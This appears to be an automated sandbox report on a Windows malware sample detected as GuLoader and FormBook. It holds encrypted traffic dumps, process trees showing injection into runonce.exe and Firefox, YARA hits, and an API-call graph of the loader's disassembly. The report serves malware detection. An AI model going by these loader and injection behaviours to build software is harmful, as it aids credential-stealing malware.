                                        2024-06-04 12:34:05 UTC1255INData Raw: f2 dc 2c 34 a6 6a 65 15 5f 33 23 90 71 a7 a7 b0 00 4c c0 3b 8c 0a ca 8b 24 b3 fa 85 04 a1 b8 14 8b 0d 1d 24 c3 50 6d 27 be d6 71 c7 9a 37 08 97 82 84 66 b7 f5 7b 7e ff 4e c7 44 3e 9c 7e 38 dc 95 a9 d0 bb 33 fe 1d 87 21 48 6a 0e 4a 80 4b d9 f3 d8 ea c4 c1 8d a2 67 55 0c 4a 13 11 42 28 78 c6 6a ec 92 47 9e 85 e2 73 23 6f ce f7 5c a6 25 1f 76 44 86 51 73 0a 46 aa cd ca 3b 94 88 c3 ab 0a 44 58 e2 a3 97 50 62 23 ea 6a 6b d3 f4 5b da 8c 19 fb f3 3c 8a c4 0b 34 e8 33 a3 5a 94 12 22 2c 42 d0 3c 2a e5 0a 82 f3 18 63 ff 84 cf 59 f5 69 57 f7 42 59 34 1d 82 c2 ad cf 71 c6 59 64 94 88 6f 66 aa 45 e6 67 fe ab f6 0f 47 60 39 7a 4b 4d b0 c7 2f 8e 01 e2 35 c6 c8 3e 04 f4 86 81 3a e5 16 26 78 0e 85 ce c9 6d 96 76 4b bd b6 88 82 d4 39 3e fc e4 51 7c fc 99 eb ad d9 cd f7 84
                                        Data Ascii: ,4je_3#qL;$$Pm'q7f{~ND>~83!HjJKgUJB(xjGs#o\%vDQsF;DXPb#jk[<43Z",B<*cYiWBY4qYdofEgG`9zKM/5>:&xmvK9>Q|
                                        2024-06-04 12:34:05 UTC1255INData Raw: 17 08 36 63 d8 21 4d 59 2d 7a 63 bc 0e eb 17 48 e6 83 11 4e 07 50 e5 d3 d9 e7 64 59 71 85 a5 8a 9f b2 29 89 10 5f d9 cb 99 d0 d8 d0 80 b9 d0 27 e9 25 de 77 00 ee 44 6c 76 96 eb 67 8e 14 63 3c 9a 88 4b ca a1 aa 82 74 95 0e 30 51 32 15 d1 4e 25 91 06 10 d1 0e 36 4c 88 d4 90 cd 83 01 60 b9 5b c5 c6 94 46 c4 5d c9 d2 ad 59 fc e5 0a c8 f8 ac c8 11 69 b4 69 76 6f cb 37 4f d1 44 14 8d 02 4f 21 0d b4 63 d4 31 03 22 46 cc bd 1c 33 89 e6 e8 f4 75 7f 1b fe 97 85 1d 34 a0 13 47 76 e0 1c 75 58 f9 56 bf 4d f7 12 98 a8 59 e1 bb e4 2b 24 c2 b7 30 dd 24 77 e1 67 3b 2d a3 70 c4 14 2f af dc 64 21 46 f5 a3 6b fb 28 fd 59 21 2f 8e ec 56 43 ee 34 f2 b0 eb 82 ee 0b c7 34 19 a5 e5 ca 8a 14 92 d4 86 d1 3e 6d 9c 69 ac d1 51 57 e0 38 19 0b 2c 2d ca cd a4 06 d4 ed 8e ef 12 22 1b e7
                                        Data Ascii: 6c!MY-zcHNPdYq)_'%wDlvgc<Kt0Q2N%6L`[F]Yiivo7ODO!c1"F3u4GvuXVMY+$0$wg;-p/d!Fk(Y!/VC44>miQW8,-"
                                        2024-06-04 12:34:05 UTC1255INData Raw: 67 9f d7 7f dd a4 a6 fc d4 77 ee 82 f5 de 6d 1d fa ec f0 5c e7 ae a6 60 bc d4 1d b5 8a 13 32 2a e2 3d 51 55 79 da 8c ba 61 76 d9 2a 94 81 5d 50 bc f4 23 c0 14 c5 12 9a a2 ed 5e 64 a0 e8 0c e2 a6 ac 25 59 d4 dc db c6 ad 67 f9 78 87 de 63 35 d1 97 83 35 f1 ac 3a c0 38 42 dc 76 7b 27 0d 97 04 e3 84 bc 15 3e 09 42 27 d8 0f a9 7b fe 10 01 89 5d 78 d3 6d 13 66 f9 1d f4 f9 4c d6 01 9e 3e 9d da 94 df bc 6a 3f f4 0c 4f c6 8b 79 75 58 fa 3a 77 c5 70 34 4a af a6 3c 9a d9 78 e9 82 cb 1e 0e aa 56 08 71 a5 30 5e b1 89 cf b6 a7 0d fd 8a a9 7a c7 de 99 95 49 cb 86 40 b9 fc 70 c9 2d 21 7a 02 2d 11 af 71 66 11 63 a3 f1 b9 cd ef ca 27 12 ad 6d d9 22 3a 12 d8 e4 75 d2 33 aa 12 54 3d 8c ec 20 a4 3b 8e 70 c7 9e 0d 7c 57 a6 8e 32 3f d6 c7 b8 2e e8 b8 d6 77 10 b9 1e 64 01 af 12
                                        Data Ascii: gwm\`2*=QUyav*]P#^d%Ygxc55:8Bv{'>B'{]xmfL>j?OyuX:wp4J<xVq0^zI@p-!z-qfc'm":u3T= ;p|W2?.wd


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:08:33:04
                                        Start date:04/06/2024
                                        Path:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\ulACwpUCSU.exe"
                                        Imagebase:0x400000
                                        File size:627'775 bytes
                                        MD5 hash:B6F8B1C89399490857FACFCF5BB78D86
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2885919945.0000000005AF5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:08:33:46
                                        Start date:04/06/2024
                                        Path:C:\Users\user\Desktop\ulACwpUCSU.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\ulACwpUCSU.exe"
                                        Imagebase:0x400000
                                        File size:627'775 bytes
                                        MD5 hash:B6F8B1C89399490857FACFCF5BB78D86
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:08:34:09
                                        Start date:04/06/2024
                                        Path:C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe"
                                        Imagebase:0xec0000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:5
                                        Start time:08:34:11
                                        Start date:04/06/2024
                                        Path:C:\Windows\SysWOW64\runonce.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\runonce.exe"
                                        Imagebase:0x140000
                                        File size:47'104 bytes
                                        MD5 hash:7430CCC7226A6FF76B6D55B96F6CE53C
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:false

                                        General

                                        Target ID:6
                                        Start time:08:34:24
                                        Start date:04/06/2024
                                        Path:C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe"
                                        Imagebase:0xec0000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:7
                                        Start time:08:34:35
                                        Start date:04/06/2024
                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                        Imagebase:0x7ff7f7070000
                                        File size:687'008 bytes
                                        MD5 hash:D1CC73370B9EF7D74E6D9FD9248CD687
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:20.9%
                                          Dynamic/Decrypted Code Coverage:14.3%
                                          Signature Coverage:19.7%
                                          Total number of Nodes:1474
                                          Total number of Limit Nodes:43
                                          execution_graph 3866 4022c0 3867 4022f0 3866->3867 3868 4022c5 3866->3868 3878 4029fd 3867->3878 3895 402b07 3868->3895 3871 4022cc 3873 4022d6 3871->3873 3877 40230d 3871->3877 3872 4022f7 3884 402a3d RegOpenKeyExA 3872->3884 3874 4029fd 18 API calls 3873->3874 3876 4022dd RegDeleteValueA RegCloseKey 3874->3876 3876->3877 3879 402a09 3878->3879 3899 405d58 3879->3899 3882 402a36 3882->3872 3885 402ad1 3884->3885 3892 402a68 3884->3892 3885->3877 3886 402a8e RegEnumKeyA 3887 402aa0 RegCloseKey 3886->3887 3886->3892 3938 406061 GetModuleHandleA 3887->3938 3888 402ac5 RegCloseKey 3894 402ab4 3888->3894 3890 402a3d 3 API calls 3890->3892 3892->3886 3892->3887 3892->3888 3892->3890 3893 402ae0 RegDeleteKeyA 3893->3894 3894->3885 3896 4029fd 18 API calls 3895->3896 3897 402b20 3896->3897 3898 402b2e RegOpenKeyExA 3897->3898 3898->3871 3915 405d65 3899->3915 3900 405f88 3901 402a2a 3900->3901 3933 405d36 lstrcpynA 3900->3933 3901->3882 3917 405fa1 3901->3917 3903 405e06 GetVersion 3903->3915 3904 405f5f lstrlenA 3904->3915 3907 405d58 10 API calls 3907->3904 3909 405e7e GetSystemDirectoryA 3909->3915 3910 405e91 GetWindowsDirectoryA 3910->3915 3911 405fa1 5 API calls 3911->3915 3912 405d58 10 API calls 3912->3915 3913 405f08 lstrcatA 3913->3915 3914 405ec5 SHGetSpecialFolderLocation 3914->3915 3916 405edd SHGetPathFromIDListA CoTaskMemFree 3914->3916 3915->3900 3915->3903 3915->3904 3915->3907 3915->3909 3915->3910 3915->3911 3915->3912 3915->3913 3915->3914 3926 405c1d RegOpenKeyExA 3915->3926 3931 405c94 wsprintfA 3915->3931 3932 405d36 lstrcpynA 3915->3932 3916->3915 3918 405fad 3917->3918 3920 40600a CharNextA 3918->3920 3922 406015 3918->3922 3924 405ff8 CharNextA 3918->3924 3925 406005 CharNextA 3918->3925 3934 4057f1 3918->3934 3919 406019 CharPrevA 3919->3922 3920->3918 3920->3922 3922->3919 3923 406034 3922->3923 3923->3882 3924->3918 3925->3920 3927 405c50 RegQueryValueExA 3926->3927 3928 405c8e 3926->3928 3929 405c71 RegCloseKey 3927->3929 3928->3915 3929->3928 3931->3915 3932->3915 3933->3901 3935 4057f7 3934->3935 3936 40580a 3935->3936 3937 4057fd CharNextA 3935->3937 3936->3918 3937->3935 3939 406088 GetProcAddress 3938->3939 3940 40607d LoadLibraryA 3938->3940 3941 402ab0 3939->3941 3940->3939 3940->3941 3941->3893 3941->3894 4939 10001000 4942 1000101b 4939->4942 4949 100014bb 4942->4949 4944 10001020 4945 10001024 4944->4945 4946 10001027 GlobalAlloc 4944->4946 4947 100014e2 3 API calls 4945->4947 4946->4945 4948 10001019 4947->4948 4951 100014c1 4949->4951 4950 100014c7 4950->4944 4951->4950 4952 100014d3 GlobalFree 4951->4952 4952->4944 4953 4019c0 4954 4029fd 18 API calls 4953->4954 4955 4019c7 4954->4955 4956 4029fd 18 API calls 4955->4956 4957 4019d0 4956->4957 4958 4019d7 lstrcmpiA 4957->4958 4959 4019e9 lstrcmpA 4957->4959 4960 4019dd 4958->4960 4959->4960 4961 402b42 4962 402b51 SetTimer 4961->4962 4963 402b6a 4961->4963 4962->4963 4964 402bb8 4963->4964 4965 402bbe MulDiv 4963->4965 4966 402b78 wsprintfA SetWindowTextA SetDlgItemTextA 4965->4966 4966->4964 4968 402645 4969 4029fd 18 API calls 4968->4969 4970 40264c FindFirstFileA 4969->4970 4971 40266f 4970->4971 4972 40265f 4970->4972 4976 405c94 wsprintfA 4971->4976 4974 402676 4977 405d36 lstrcpynA 4974->4977 4976->4974 4977->4972 4978 403745 4979 403750 4978->4979 4980 403754 4979->4980 4981 403757 GlobalAlloc 4979->4981 4981->4980 3942 4023c8 3943 402b07 19 API calls 3942->3943 3944 4023d2 3943->3944 3945 4029fd 18 API calls 3944->3945 3946 4023db 3945->3946 3947 4023e5 RegQueryValueExA 3946->3947 3950 402663 3946->3950 3948 40240b RegCloseKey 3947->3948 3949 402405 3947->3949 3948->3950 3949->3948 3953 405c94 wsprintfA 3949->3953 3953->3948 4146 4014ca 4147 40501f 25 API calls 4146->4147 4148 4014d1 4147->4148 4996 1000180d 4997 10001830 4996->4997 4998 10001860 GlobalFree 4997->4998 4999 10001872 4997->4999 4998->4999 5000 10001266 2 API calls 4999->5000 5001 100019e3 GlobalFree GlobalFree 5000->5001 4188 1000270f 4189 1000275f 4188->4189 4190 1000271f VirtualProtect 4188->4190 4190->4189 5009 401cd0 GetDlgItem GetClientRect 5010 4029fd 18 API calls 5009->5010 5011 401cfc LoadImageA SendMessageA 5010->5011 5012 402892 5011->5012 5013 401d1a DeleteObject 5011->5013 5013->5012 5014 4024d1 5015 4024d6 5014->5015 5016 4024e7 5014->5016 5017 4029e0 18 API calls 5015->5017 5018 4029fd 18 API calls 5016->5018 5020 4024dd 5017->5020 5019 4024ee lstrlenA 5018->5019 5019->5020 5021 40250d WriteFile 5020->5021 5022 402663 5020->5022 5021->5022 5023 4025d3 5024 4025da 5023->5024 5026 40283f 5023->5026 5025 4029e0 18 API calls 5024->5025 5027 4025e5 5025->5027 5028 4025ec SetFilePointer 5027->5028 5028->5026 5029 4025fc 5028->5029 5031 405c94 wsprintfA 5029->5031 5031->5026 4243 4014d6 4244 4029e0 18 API calls 4243->4244 4245 4014dc Sleep 4244->4245 4247 402892 4245->4247 4665 401dd8 4666 4029fd 18 API calls 4665->4666 4667 401dde 4666->4667 4668 4029fd 18 API calls 4667->4668 4669 401de7 4668->4669 4670 4029fd 18 API calls 4669->4670 4671 401df0 4670->4671 4672 4029fd 18 API calls 4671->4672 4673 401df9 4672->4673 4674 401423 25 API calls 4673->4674 4675 401e00 ShellExecuteA 4674->4675 4676 401e2d 4675->4676 5032 1000161a 5033 10001649 5032->5033 5034 10001a5d 18 API calls 5033->5034 5035 10001650 5034->5035 5036 10001663 5035->5036 5037 10001657 5035->5037 5039 1000168a 5036->5039 5040 1000166d 5036->5040 5038 10001266 2 API calls 5037->5038 5041 10001661 5038->5041 5043 10001690 5039->5043 5044 100016b4 5039->5044 5042 100014e2 3 API calls 5040->5042 5046 10001672 5042->5046 5047 10001559 3 API calls 5043->5047 5045 100014e2 3 API calls 5044->5045 5045->5041 5048 10001559 3 API calls 5046->5048 5049 10001695 5047->5049 5051 10001678 5048->5051 5050 10001266 2 API calls 5049->5050 5052 1000169b GlobalFree 5050->5052 5053 10001266 2 API calls 5051->5053 5052->5041 5054 100016af GlobalFree 5052->5054 5055 1000167e GlobalFree 5053->5055 5054->5041 5055->5041 4809 40155b 4810 401577 ShowWindow 4809->4810 4811 40157e 4809->4811 4810->4811 4812 402892 4811->4812 4813 40158c ShowWindow 4811->4813 4813->4812 5063 401edc 5064 4029fd 18 API calls 5063->5064 5065 401ee3 GetFileVersionInfoSizeA 5064->5065 5066 401f06 GlobalAlloc 5065->5066 5068 401f5c 5065->5068 5067 401f1a GetFileVersionInfoA 5066->5067 5066->5068 5067->5068 5069 401f2b VerQueryValueA 5067->5069 5069->5068 5070 401f44 5069->5070 5074 405c94 wsprintfA 5070->5074 5072 401f50 5075 405c94 wsprintfA 5072->5075 5074->5072 5075->5068 4841 40515d 4842 405308 4841->4842 4843 40517f GetDlgItem GetDlgItem GetDlgItem 4841->4843 4845 405310 GetDlgItem CreateThread CloseHandle 4842->4845 4846 405338 4842->4846 4887 404021 SendMessageA 4843->4887 4845->4846 4890 4050f1 5 API calls 4845->4890 4848 405366 4846->4848 4851 405387 4846->4851 4852 40534e ShowWindow ShowWindow 4846->4852 4847 4051ef 4856 4051f6 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4847->4856 4849 4053c1 4848->4849 4850 40536e 4848->4850 4849->4851 4863 4053ce SendMessageA 4849->4863 4853 405376 4850->4853 4854 40539a ShowWindow 4850->4854 4855 404053 8 API calls 4851->4855 4889 404021 SendMessageA 4852->4889 4858 403fc5 SendMessageA 4853->4858 4859 4053ba 4854->4859 4860 4053ac 4854->4860 4869 405393 4855->4869 4861 405264 4856->4861 4862 405248 SendMessageA SendMessageA 4856->4862 4858->4851 4865 403fc5 SendMessageA 4859->4865 4864 40501f 25 API calls 4860->4864 4866 405277 4861->4866 4867 405269 SendMessageA 4861->4867 4862->4861 4868 4053e7 CreatePopupMenu 4863->4868 4863->4869 4864->4859 4865->4849 4870 403fec 19 API calls 4866->4870 4867->4866 4871 405d58 18 API calls 4868->4871 4873 405287 4870->4873 4872 4053f7 AppendMenuA 4871->4872 4874 405415 GetWindowRect 4872->4874 4875 405428 TrackPopupMenu 4872->4875 4876 405290 ShowWindow 4873->4876 4877 4052c4 GetDlgItem SendMessageA 4873->4877 4874->4875 4875->4869 4878 405444 4875->4878 4879 4052b3 4876->4879 4880 4052a6 ShowWindow 4876->4880 4877->4869 4881 4052eb SendMessageA SendMessageA 4877->4881 4882 405463 SendMessageA 4878->4882 4888 404021 SendMessageA 4879->4888 4880->4879 4881->4869 4882->4882 4883 405480 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4882->4883 4885 4054a2 SendMessageA 4883->4885 4885->4885 4886 4054c4 GlobalUnlock SetClipboardData CloseClipboard 4885->4886 4886->4869 4887->4847 4888->4877 4889->4848 5081 4018e3 5082 40191a 5081->5082 5083 4029fd 18 API calls 5082->5083 5084 40191f 5083->5084 5085 4055f6 71 API calls 5084->5085 5086 401928 5085->5086 5087 4043e3 5088 4043f3 5087->5088 5089 404419 5087->5089 5090 403fec 19 API calls 5088->5090 5091 404053 8 API calls 5089->5091 5092 404400 SetDlgItemTextA 5090->5092 5093 404425 5091->5093 5092->5089 5094 4018e6 5095 4029fd 18 API calls 5094->5095 5096 4018ed 5095->5096 5097 40554a MessageBoxIndirectA 5096->5097 5098 4018f6 5097->5098 3954 401f68 3955 401f7a 3954->3955 3956 402028 3954->3956 3957 4029fd 18 API calls 3955->3957 3959 401423 25 API calls 3956->3959 3958 401f81 3957->3958 3960 4029fd 18 API calls 3958->3960 3964 402181 3959->3964 3961 401f8a 3960->3961 3962 401f92 GetModuleHandleA 3961->3962 3963 401f9f LoadLibraryExA 3961->3963 3962->3963 3965 401faf GetProcAddress 3962->3965 3963->3956 3963->3965 3966 401ffb 3965->3966 3967 401fbe 3965->3967 4020 40501f 3966->4020 3969 401fc6 3967->3969 3970 401fdd 3967->3970 4017 401423 3969->4017 3975 100016bd 3970->3975 3972 401fce 3972->3964 3973 40201c FreeLibrary 3972->3973 3973->3964 3976 100016ed 3975->3976 4031 10001a5d 3976->4031 3978 100016f4 3979 1000180a 3978->3979 3980 10001705 3978->3980 3981 1000170c 3978->3981 3979->3972 4080 100021b0 3980->4080 4063 100021fa 3981->4063 3986 10001770 3992 100017b2 3986->3992 3993 10001776 3986->3993 3987 10001752 4093 100023da 3987->4093 3988 10001722 3991 10001728 3988->3991 3997 10001733 3988->3997 3989 1000173b 4004 10001731 3989->4004 4090 10002aa7 3989->4090 3991->4004 4074 100027ec 3991->4074 3995 100023da 11 API calls 3992->3995 3999 10001559 3 API calls 3993->3999 4005 100017a4 3995->4005 3996 10001758 4104 10001559 3996->4104 4084 1000258d 3997->4084 4002 1000178c 3999->4002 4003 100023da 11 API calls 4002->4003 4003->4005 4004->3986 4004->3987 4008 100017f9 4005->4008 4115 100023a0 4005->4115 4007 10001739 4007->4004 4008->3979 4010 10001803 GlobalFree 4008->4010 4010->3979 4014 100017e5 4014->4008 4119 100014e2 wsprintfA 4014->4119 4015 100017de FreeLibrary 4015->4014 4018 40501f 25 API calls 4017->4018 4019 401431 4018->4019 4019->3972 4021 4050dd 4020->4021 4022 40503a 4020->4022 4021->3972 4023 405057 lstrlenA 4022->4023 4024 405d58 18 API calls 4022->4024 4025 405080 4023->4025 4026 405065 lstrlenA 4023->4026 4024->4023 4028 405093 4025->4028 4029 405086 SetWindowTextA 4025->4029 4026->4021 4027 405077 lstrcatA 4026->4027 4027->4025 4028->4021 4030 405099 SendMessageA SendMessageA SendMessageA 4028->4030 4029->4028 4030->4021 4122 10001215 GlobalAlloc 4031->4122 4033 10001a81 4123 10001215 GlobalAlloc 4033->4123 4035 10001cbb GlobalFree GlobalFree GlobalFree 4036 10001cd8 4035->4036 4054 10001d22 4035->4054 4037 1000201a 4036->4037 4046 10001ced 4036->4046 4036->4054 4039 1000203c GetModuleHandleA 4037->4039 4037->4054 4038 10001b60 GlobalAlloc 4059 10001a8c 4038->4059 4041 10002062 4039->4041 4042 1000204d LoadLibraryA 4039->4042 4040 10001bc9 GlobalFree 4040->4059 4130 100015a4 GetProcAddress 4041->4130 4042->4041 4042->4054 4043 10001bab lstrcpyA 4044 10001bb5 lstrcpyA 4043->4044 4044->4059 4046->4054 4126 10001224 4046->4126 4047 100020b3 4050 100020c0 lstrlenA 4047->4050 4047->4054 4049 10001f7a 4049->4054 4055 10001fbe lstrcpyA 4049->4055 4131 100015a4 GetProcAddress 4050->4131 4051 10002074 4051->4047 4062 1000209d GetProcAddress 4051->4062 4054->3978 4055->4054 4056 10001c07 4056->4059 4124 10001534 GlobalSize GlobalAlloc 4056->4124 4057 10001e75 GlobalFree 4057->4059 4058 100020d9 4058->4054 4059->4035 4059->4038 4059->4040 4059->4043 4059->4044 4059->4049 4059->4054 4059->4056 4059->4057 4060 10001224 2 API calls 4059->4060 4129 10001215 GlobalAlloc 4059->4129 4060->4059 4062->4047 4064 10002212 4063->4064 4066 10002349 GlobalFree 4064->4066 4068 100022b9 GlobalAlloc MultiByteToWideChar 4064->4068 4069 1000230a lstrlenA 4064->4069 4070 10001224 GlobalAlloc lstrcpynA 4064->4070 4133 100012ad 4064->4133 4066->4064 4067 10001712 4066->4067 4067->3988 4067->3989 4067->4004 4071 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4068->4071 4073 10002303 4068->4073 4069->4066 4069->4073 4070->4064 4071->4066 4073->4066 4137 10002521 4073->4137 4076 100027fe 4074->4076 4075 100028a3 EnumWindows 4077 100028c1 4075->4077 4076->4075 4078 100029b2 GetLastError 4077->4078 4079 100029bd 4077->4079 4078->4079 4079->4004 4081 100021c0 4080->4081 4083 1000170b 4080->4083 4082 100021d2 GlobalAlloc 4081->4082 4081->4083 4082->4081 4083->3981 4088 100025a9 4084->4088 4085 100025fa GlobalAlloc 4089 1000261c 4085->4089 4086 1000260d 4087 10002612 GlobalSize 4086->4087 4086->4089 4087->4089 4088->4085 4088->4086 4089->4007 4091 10002ab2 4090->4091 4092 10002af2 GlobalFree 4091->4092 4140 10001215 GlobalAlloc 4093->4140 4095 10002473 WideCharToMultiByte 4098 100023e6 4095->4098 4096 1000243a lstrcpynA 4096->4098 4097 1000244b StringFromGUID2 WideCharToMultiByte 4097->4098 4098->4095 4098->4096 4098->4097 4099 10002494 wsprintfA 4098->4099 4100 100024b8 GlobalFree 4098->4100 4101 100024f2 GlobalFree 4098->4101 4102 10001266 2 API calls 4098->4102 4141 100012d1 4098->4141 4099->4098 4100->4098 4101->3996 4102->4098 4145 10001215 GlobalAlloc 4104->4145 4106 1000155f 4107 1000156c lstrcpyA 4106->4107 4109 10001586 4106->4109 4110 100015a0 4107->4110 4109->4110 4111 1000158b wsprintfA 4109->4111 4112 10001266 4110->4112 4111->4110 4113 100012a8 GlobalFree 4112->4113 4114 1000126f GlobalAlloc lstrcpynA 4112->4114 4113->4005 4114->4113 4116 100023ae 4115->4116 4118 100017c5 4115->4118 4117 100023c7 GlobalFree 4116->4117 4116->4118 4117->4116 4118->4014 4118->4015 4120 10001266 2 API calls 4119->4120 4121 10001503 4120->4121 4121->4008 4122->4033 4123->4059 4125 10001552 4124->4125 4125->4056 4132 10001215 GlobalAlloc 4126->4132 4128 10001233 lstrcpynA 4128->4054 4129->4059 4130->4051 4131->4058 4132->4128 4134 100012b4 4133->4134 4135 10001224 2 API calls 4134->4135 4136 100012cf 4135->4136 4136->4064 4138 10002585 4137->4138 4139 1000252f VirtualAlloc 4137->4139 4138->4073 4139->4138 4140->4098 4142 100012f9 4141->4142 4143 100012da 4141->4143 4142->4098 4143->4142 4144 100012e0 lstrcpyA 4143->4144 4144->4142 4145->4106 5099 40286d SendMessageA 5100 402892 5099->5100 5101 402887 InvalidateRect 5099->5101 5101->5100 5102 4014f0 SetForegroundWindow 5103 402892 5102->5103 5104 401af0 5105 4029fd 18 API calls 5104->5105 5106 401af7 5105->5106 5107 4029e0 18 API calls 5106->5107 5108 401b00 wsprintfA 5107->5108 5109 402892 5108->5109 5110 4019f1 5111 4029fd 18 API calls 5110->5111 5112 4019fa ExpandEnvironmentStringsA 5111->5112 5113 401a0e 5112->5113 5115 401a21 5112->5115 5114 401a13 lstrcmpA 5113->5114 5113->5115 5114->5115 5116 100015b3 5117 100014bb GlobalFree 5116->5117 5119 100015cb 5117->5119 5118 10001611 GlobalFree 5119->5118 5120 100015e6 5119->5120 5121 100015fd VirtualFree 5119->5121 5120->5118 5121->5118 5129 401c78 5130 4029e0 18 API calls 5129->5130 5131 401c7e IsWindow 5130->5131 5132 4019e1 5131->5132 5133 40477a 5134 4047a6 5133->5134 5135 40478a 5133->5135 5137 4047d9 5134->5137 5138 4047ac SHGetPathFromIDListA 5134->5138 5144 40552e GetDlgItemTextA 5135->5144 5139 4047bc 5138->5139 5143 4047c3 SendMessageA 5138->5143 5141 40140b 2 API calls 5139->5141 5140 404797 SendMessageA 5140->5134 5141->5143 5143->5137 5144->5140 5145 1000103d 5146 1000101b 5 API calls 5145->5146 5147 10001056 5146->5147 5148 4014fe 5149 401506 5148->5149 5151 401519 5148->5151 5150 4029e0 18 API calls 5149->5150 5150->5151 4891 40227f 4892 4029fd 18 API calls 4891->4892 4893 402290 4892->4893 4894 4029fd 18 API calls 4893->4894 4895 402299 4894->4895 4896 4029fd 18 API calls 4895->4896 4897 4022a3 GetPrivateProfileStringA 4896->4897 5152 401000 5153 401037 BeginPaint GetClientRect 5152->5153 5154 40100c DefWindowProcA 5152->5154 5156 4010f3 5153->5156 5157 401179 5154->5157 5158 401073 CreateBrushIndirect FillRect DeleteObject 5156->5158 5159 4010fc 5156->5159 5158->5156 5160 401102 CreateFontIndirectA 5159->5160 5161 401167 EndPaint 5159->5161 5160->5161 5162 401112 6 API calls 5160->5162 5161->5157 5162->5161 5163 404100 lstrcpynA lstrlenA 5164 402602 5165 402892 5164->5165 5166 402609 5164->5166 5167 40260f FindClose 5166->5167 5167->5165 5175 402683 5176 4029fd 18 API calls 5175->5176 5177 402691 5176->5177 5178 4026a7 5177->5178 5180 4029fd 18 API calls 5177->5180 5179 4059a2 2 API calls 5178->5179 5181 4026ad 5179->5181 5180->5178 5201 4059c7 GetFileAttributesA CreateFileA 5181->5201 5183 4026ba 5184 402763 5183->5184 5185 4026c6 